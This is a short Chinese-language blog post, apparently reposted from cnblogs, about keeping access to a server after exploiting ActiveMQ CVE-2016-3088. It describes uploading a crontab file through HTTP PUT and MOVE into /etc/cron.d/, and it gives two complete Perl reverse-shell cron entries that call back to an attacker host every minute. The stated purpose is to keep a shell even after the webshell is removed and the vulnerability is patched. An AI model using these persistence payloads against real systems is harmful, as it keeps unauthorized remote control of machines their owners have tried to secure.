后感-利用crontab完成实时反弹shell
作者:互联网
今天完成ActiveMQ 任意文件写入漏洞(CVE-2016-3088)突然想到一个问题,如果我上传的webshell被清除了且漏洞也修复了我该怎么办,因此有了这篇文章
同样,通过PUT将配置文件上传
通过MOVE方法将配置文件移动至/etc/cron.d/下
上传成功
监听端口反弹shell
保持1分钟反弹一次,这样即使连接断开、webshell被清除了且漏洞被修复,也可以拿到shell。
crontab反弹shell配置文件
将下列配置文件写入 /etc/cron.d/root ,即可
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ubuntu系统,将配置文件写入 /var/spool/cron/crontabs/root ,且 * 后不需要指定root用户,如下:
*/1 * * * * perl -e 'use Socket;$i="vps.ip";$p=8989;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
标签:bin,shell,配置文件,open,crontab,cron,后感,root 来源: https://www.cnblogs.com/fnkk/p/14237064.html